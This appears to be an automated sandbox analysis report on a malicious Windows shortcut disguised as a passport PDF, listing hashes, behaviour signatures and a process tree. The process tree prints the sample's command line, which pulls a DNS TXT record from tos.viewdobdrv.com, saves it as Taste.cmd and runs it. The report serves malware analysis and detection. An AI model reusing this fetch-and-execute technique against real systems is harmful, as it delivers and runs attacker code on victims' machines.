Analysis
-
max time kernel
142s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20231127-en -
resource tags
arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system -
submitted
13-12-2023 08:34
Static task
static1
Behavioral task
behavioral1
Sample
Passport20231023_90223 pdf lnk.lnk
Resource
win7-20231023-en
Behavioral task
behavioral2
Sample
Passport20231023_90223 pdf lnk.lnk
Resource
win10v2004-20231127-en
General
-
Target
Passport20231023_90223 pdf lnk.lnk
-
Size
1KB
-
MD5
c97607e6e04da0e5ef7414821afba0f5
-
SHA1
2acd031bbb023660c5c214809ef7e32a040ad4dd
-
SHA256
9a1d62c7aa156b0920f87b422ab3685e60393fc97a0b742e533e791adcf5a31d
-
SHA512
a5a1d693b1da51fbdc46047af26697efd5f51bf1cc0928065a4cc67a19c1a39d58e68e8b7a70666d9d350c337f5bd5fb5c80fa796e35cc8b809c0b90c33b0b61
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2013768333-4045878716-2922883000-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
svchost.exedescription pid process Token: SeManageVolumePrivilege 1040 svchost.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.execmd.exedescription pid process target process PID 4584 wrote to memory of 1708 4584 cmd.exe cmd.exe PID 4584 wrote to memory of 1708 4584 cmd.exe cmd.exe PID 1708 wrote to memory of 1632 1708 cmd.exe nslookup.exe PID 1708 wrote to memory of 1632 1708 cmd.exe nslookup.exe PID 1708 wrote to memory of 1040 1708 cmd.exe findstr.exe PID 1708 wrote to memory of 1040 1708 cmd.exe findstr.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Passport20231023_90223 pdf lnk.lnk"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4584 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" cmd /k cd C:\Users\Admin\AppData\Local\Temp & NSlookup -type=TXT tos.viewdobdrv.com | findstr """" > Taste.cmd & Taste.cmd2⤵
- Suspicious use of WriteProcessMemory
PID:1708 -
C:\Windows\system32\findstr.exefindstr """"3⤵PID:1040
-
-
C:\Windows\system32\nslookup.exeNSlookup -type=TXT tos.viewdobdrv.com3⤵PID:1632
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe1⤵PID:1720
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k UnistackSvcGroup1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1040
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
16KB
MD517497c9e0bc526ed0819cd6ad93df7ae
SHA161f164b81a2a2b35af657237efc0b4f7965a414d
SHA256f86168e7db6ced2551d982ca8adb6c328eeb0cd0b4f44d910209001d79b678ae
SHA512e03e2a472845c153d610a2d25de8c61f85143a8a163219aa84982e54db83863a0172e66aab81c8c5c0263940dacf77fd000b87e948acd377091a752627659d69
-
Filesize
224B
MD5e201ea24b4a9bc902fdba32adef12a1d
SHA12f612798e94d635629ee357cf9776c19ed54cef4
SHA256f712c3e0e170c00971fe11a237799b6ae99f6bc55671a881f5875bf4fbf0d2fe
SHA512643878798d08c99bdda2116b09127cba93cced257c1cbc1497c3929cf0a61dec001f2968e5a7638119c0c0fbd24116f3ba3abbcff13ffc574deebd8118ede766